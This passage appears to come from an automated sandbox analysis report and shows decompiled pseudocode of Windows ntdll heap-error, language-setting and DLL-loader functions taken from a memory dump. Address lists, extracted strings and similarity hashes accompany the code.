				E0125B150("Error code: %d - %s\n",  *0x1345898);
				_t113 =  *0x13458a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0125B150();
					} else {
						E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0125B150("Parameter1: %p\n",  *0x13458a4);
				}
				_t115 =  *0x13458a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0125B150();
					} else {
						E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0125B150("Parameter2: %p\n",  *0x13458a8);
				}
				_t117 =  *0x13458ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0125B150();
					} else {
						E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0125B150("Parameter3: %p\n",  *0x13458ac);
				}
				_t119 =  *0x13458b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0125B150();
					} else {
						E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13458b4);
					E0125B150("Last known valid blocks: before - %p, after - %p\n",  *0x13458b0);
				} else {
					_t120 =  *0x13458b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0125B150();
				} else {
					E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0125B150("Stack trace available at %p\n", 0x13458c0);
			}

0x01311c10
0x01311c16
0x01311c1e
0x01311c3d
0x01311c3e
0x01311c20
0x01311c35
0x01311c3a
0x01311c44
0x01311c55
0x01311c5a
0x01311c65
0x01311c67
0x00000000
0x01311c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01311c67
0x01311cdc
0x01311ce5
0x01311d04
0x01311d05
0x01311ce7
0x01311cfc
0x01311d01
0x01311d0b
0x01311d17
0x01311d1f
0x01311d25
0x01311d30
0x01311d4f
0x01311d50
0x01311d32
0x01311d47
0x01311d4c
0x01311d61
0x01311d67
0x01311d68
0x01311d6e
0x01311d79
0x01311d98
0x01311d99
0x01311d7b
0x01311d90
0x01311d95
0x01311daa
0x01311db0
0x01311db1
0x01311db7
0x01311dc2
0x01311de1
0x01311de2
0x01311dc4
0x01311dd9
0x01311dde
0x01311df3
0x01311df9
0x01311dfa
0x01311e00
0x01311e0a
0x01311e13
0x01311e32
0x01311e33
0x01311e15
0x01311e2a
0x01311e2f
0x01311e39
0x01311e4a
0x01311e02
0x01311e02
0x01311e08
0x00000000
0x00000000
0x01311e08
0x01311e5b
0x01311e7a
0x01311e7b
0x01311e5d
0x01311e72
0x01311e77
0x01311e95

Strings

heap_failure_multiple_entries_corruption, xrefs: 01311C8A
Stack trace available at %p, xrefs: 01311E86
heap_failure_invalid_allocation_type, xrefs: 01311CB4
heap_failure_entry_corruption, xrefs: 01311C83
Parameter3: %p, xrefs: 01311DEE
Parameter1: %p, xrefs: 01311D5C
Heap error detected at %p (heap handle %p), xrefs: 01311C50
HEAP: , xrefs: 01311C16, 01311C3D, 01311D04, 01311D4F, 01311D98, 01311DE1, 01311E32, 01311E7A
heap_failure_unknown, xrefs: 01311C75
heap_failure_internal, xrefs: 01311C6E
heap_failure_cross_heap_operation, xrefs: 01311CC2
heap_failure_buffer_overrun, xrefs: 01311C98
heap_failure_virtual_block_corruption, xrefs: 01311C91
heap_failure_usage_after_free, xrefs: 01311CBB
HEAP[%wZ]: , xrefs: 01311C30, 01311CF7, 01311D42, 01311D8B, 01311DD4, 01311E25, 01311E6D
heap_failure_freelists_corruption, xrefs: 01311CC9
Error code: %d - %s, xrefs: 01311D12
heap_failure_listentry_corruption, xrefs: 01311CD0
heap_failure_generic, xrefs: 01311C7C
heap_failure_buffer_underrun, xrefs: 01311C9F
Last known valid blocks: before - %p, after - %p, xrefs: 01311E45
heap_failure_block_not_busy, xrefs: 01311CA6
Parameter2: %p, xrefs: 01311DA5
heap_failure_lfh_bitmap_mismatch, xrefs: 01311CD7
heap_failure_invalid_argument, xrefs: 01311CAD

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 008f78c22e54d5d81a6a8638f1cf1739722b49eb54aa9dc12e76a8e77ec4989f
Instruction ID: cbd5013d614f82821f04cb7b0a74596101f05f87d6a62993419286490e94a4dc
Opcode Fuzzy Hash: 008f78c22e54d5d81a6a8638f1cf1739722b49eb54aa9dc12e76a8e77ec4989f
Instruction Fuzzy Hash: 2D610937A31149DFEB59A7B5D884D7077A9F700A34B0A806AFA0D5B744DA349C408F59

Uniqueness

Uniqueness Score: -1.00%

Function 01263D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01263D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01261B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01261B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01261B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01261B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01261B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01274620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0129F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E012A1370(_t276, 0x1234e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0129BB40(0,  &_v68, _t170);
									if(L012643C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0129BB40(_t257,  &_v68, _t243);
								if(L012643C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E012A1370(_t278, 0x1234e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01274620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0129F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E012A1370(_v16, 0x1234e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0129BB40(_t262,  &_v68, _t244);
								if(L012643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E012A1370(_t282, 0x1234e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0129BB40(_t262,  &_v68, _t201);
							if(L012643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01274620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0129F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E012A1370(_t280, 0x1234e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0129BB40(_t267,  &_v68, _t245);
							if(L012643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E012A1370(_t284, 0x1234e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0129BB40(_t267,  &_v68, _t224);
						if(L012643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01263d3c
0x01263d42
0x01263d44
0x01263d46
0x01263d49
0x01263d4c
0x01263d4f
0x01263d52
0x01263d55
0x01263d58
0x01263d5b
0x01263d5f
0x01263d61
0x01263d66
0x012b8213
0x012b8218
0x01264085
0x01264088
0x0126408e
0x01264094
0x0126409a
0x012640a0
0x012640a6
0x012640a9
0x012640af
0x012640b6
0x012640bd
0x012640bd
0x01263d83
0x012b821f
0x012b8229
0x012b8238
0x012b8238
0x012b823d
0x012b823d
0x01263da0
0x01263daf
0x01263db5
0x01263dba
0x01263dba
0x01263dd4
0x01263e94
0x01263eab
0x01263f6d
0x01263f84
0x0126406b
0x0126406b
0x0126406e
0x0126406e
0x01264070
0x01264074
0x012b8351
0x012b8351
0x0126407a
0x0126407f
0x012b835d
0x012b8370
0x012b8377
0x012b8379
0x012b837c
0x012b837c
0x012b835d
0x00000000
0x0126407f
0x01263f8a
0x01263f8d
0x01263f90
0x01263f95
0x012b830d
0x012b830f
0x01263f9b
0x01263fac
0x01263fae
0x01263fb1
0x01263fb1
0x01263fb6
0x012b8317
0x012b831a
0x00000000
0x01263fbc
0x01263fc1
0x01263fc9
0x01263fd7
0x01263fda
0x01263fdd
0x01264021
0x01264021
0x01264029
0x01264030
0x01264044
0x01264046
0x01264046
0x01264044
0x01264049
0x012b8327
0x012b8334
0x012b8339
0x012b833c
0x0126404f
0x0126404f
0x0126404f
0x01264051
0x01264056
0x01264063
0x01264063
0x01264068
0x00000000
0x01264068
0x01263fdf
0x01263fe2
0x01263fe4
0x01263fe7
0x01263fef
0x01264003
0x01264005
0x01264005
0x0126400c
0x01264013
0x01264016
0x01264017
0x0126401b
0x0126401e
0x00000000
0x0126401e
0x01263fb6
0x01263eb1
0x01263eb4
0x01263eb7
0x01263ebc
0x012b82a9
0x012b82ab
0x01263ec2
0x01263ed3
0x01263ed5
0x01263ed8
0x01263ed8
0x01263edd
0x012b82b3
0x012b82b6
0x00000000
0x01263ee3
0x01263ee8
0x01263eed
0x01263ef0
0x01263ef3
0x01263f02
0x01263f05
0x01263f08
0x012b82c0
0x012b82c3
0x012b82c5
0x012b82c8
0x012b82d0
0x012b82e4
0x012b82e6
0x012b82e6
0x012b82ed
0x012b82f4
0x012b82f7
0x012b82f8
0x012b82fc
0x012b82ff
0x012b82ff
0x01263f0e
0x01263f11
0x01263f16
0x01263f1d
0x01263f31
0x012b8307
0x012b8307
0x01263f31
0x01263f39
0x01263f48
0x01263f4d
0x01263f50
0x01263f50
0x01263f53
0x01263f58
0x01263f65
0x01263f65
0x01263f6a
0x00000000
0x01263f6a
0x01263edd
0x01263dda
0x01263ddd
0x01263de0
0x01263de5
0x012b8245
0x01263deb
0x01263df7
0x01263dfc
0x01263dfe
0x01263e01
0x01263e01
0x01263e06
0x012b824d
0x012b824f
0x012b8254
0x00000000
0x01263e0c
0x01263e11
0x01263e16
0x01263e19
0x01263e29
0x01263e2c
0x01263e2f
0x012b825c
0x012b825f
0x012b8261
0x012b8264
0x012b826c
0x012b8280
0x012b8282
0x012b8282
0x012b8289
0x012b8290
0x012b8293
0x012b8294
0x012b8298
0x012b829b
0x012b829b
0x01263e35
0x01263e38
0x01263e3d
0x01263e44
0x01263e58
0x012b82a3
0x012b82a3
0x01263e58
0x01263e60
0x01263e6f
0x01263e74
0x01263e77
0x01263e77
0x01263e7a
0x01263e7f
0x01263e8c
0x01263e8c
0x01263e91
0x00000000
0x01263e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 01263DC0
Kernel-MUI-Language-SKU, xrefs: 01263F70
WindowsExcludedProcs, xrefs: 01263D6F
Kernel-MUI-Language-Disallowed, xrefs: 01263E97
Kernel-MUI-Number-Allowed, xrefs: 01263D8C

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: c4a5f959e0f154d858182a58e204b287da05c89e2c21b75b6ecdd811a0f96add
Instruction ID: 9429ddeabec4bd062439e645c215285a4c2ded71004806aadfbed77b8ba3eb21
Opcode Fuzzy Hash: c4a5f959e0f154d858182a58e204b287da05c89e2c21b75b6ecdd811a0f96add
Instruction Fuzzy Hash: 9EF14F72D2025AEFCB15DF98C9809EEBBBDFF58750F14005AEA05A7250E7749E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012540E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E012540E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0125B150();
					} else {
						E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0125B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0125B150(", passed to %s", _t29);
					}
					_push("\n");
					E0125B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1346378 = 1;
						asm("int3");
						 *0x1346378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x012540e6
0x012540e8
0x012540f1
0x012b042d
0x012b044c
0x012b0451
0x012b042f
0x012b0444
0x012b0449
0x012b045d
0x012b0466
0x012b046e
0x012b0474
0x012b0475
0x012b047a
0x012b048a
0x012b048c
0x012b0493
0x012b0494
0x012b0494
0x00000000
0x012b049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 012B0458
, passed to %s, xrefs: 012B0469
RtlAllocateHeap, xrefs: 012B0468
HEAP: , xrefs: 012B044C
HEAP[%wZ]: , xrefs: 012B043F

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 744ea55c0e565713e1d7fef8487467e8ff326d6d4764602cb19282c4413bcdc2
Instruction ID: dc8d5ed10aecbfd97f93858c945891ef7523a4ecd01b37fd9d012e218f505b5a
Opcode Fuzzy Hash: 744ea55c0e565713e1d7fef8487467e8ff326d6d4764602cb19282c4413bcdc2
Instruction Fuzzy Hash: 03014032130281BFD36A5779D48EFA777B9DB41B70F18C01DF50457681DAF85840C924

Uniqueness

Uniqueness Score: -1.00%

Function 01288E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01288E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x134d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1348464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1345780 & 0x00000003) != 0) {
							E012D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1345780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0129B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1347984; // 0xd22bc0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1348464; // 0x76d30110
					 *0x134b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01289B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1345780 & 0x00000005) != 0) {
						_push(_t49);
						E012D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01288e0f
0x01288e16
0x01288e19
0x01288e1b
0x01288e21
0x01288e7f
0x01288e85
0x012c9354
0x012c936c
0x012c9371
0x012c937b
0x012c9381
0x012c9381
0x012c937b
0x01288e9d
0x01288e9d
0x01288e29
0x01288e2c
0x01288e38
0x01288e3e
0x01288e43
0x01288eb5
0x01288eb9
0x012c92aa
0x012c92af
0x012c92e8
0x012c92e8
0x012c92af
0x01288eb9
0x01288e45
0x01288e53
0x01288e5b
0x01288e5f
0x01288e78
0x01288e78
0x01288e7d
0x01288ec3
0x01288ecd
0x01288ed2
0x01288ed2
0x01288ec5
0x01288ec5
0x00000000
0x01288e7d
0x01288e67
0x01288ea4
0x012c931a
0x00000000
0x00000000
0x012c9320
0x01288ea4
0x01288e70
0x012c9325
0x012c9340
0x012c9345
0x012c9345
0x01288e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 012C9331, 012C935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012C932A
minkernel\ntdll\ldrsnap.c, xrefs: 012C933B, 012C9367
Querying the active activation context failed with status 0x%08lx, xrefs: 012C9357

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: c274b6ac4d50d59430b6d67a124dd8a8d636ce5404cb3efc0d375f8e03c860e2
Instruction ID: baacb0307c23ff17cebe27d7414738369ca3c762ad7515ce684394f2d30b2e0b
Opcode Fuzzy Hash: c274b6ac4d50d59430b6d67a124dd8a8d636ce5404cb3efc0d375f8e03c860e2
Instruction Fuzzy Hash: A7410B31A327179FEF36BB1CC849A35B6B5AB44744F868169F704571D2EBB06D80C381

Uniqueness

Uniqueness Score: -1.00%

Function 013149A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01314A4A, 01314A5D, 01314A5F, 01314AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01314A61
HEAP[%wZ]: , xrefs: 01314A3D, 01314AB7
This is located in the %s field of the heap header., xrefs: 01314AD6

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 85eeeb7f45b6eb19b37a11ce5cbde2ab4470ea0b845194e7d5817adbcd25a40b
Instruction ID: fcf4fa6750ee01522746855fae585eab5942ec6f22d9fe829d575f2291544f7d
Opcode Fuzzy Hash: 85eeeb7f45b6eb19b37a11ce5cbde2ab4470ea0b845194e7d5817adbcd25a40b
Instruction Fuzzy Hash: 2A312432220205EFE768DBADC888F6777A9EF04728F168459F9059B284D770E940CB69

Uniqueness

Uniqueness Score: -1.00%

Function 01268794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01268794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0126934A() != 0) {
								_t159 = E012DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1345780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E012D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1345780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0126849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
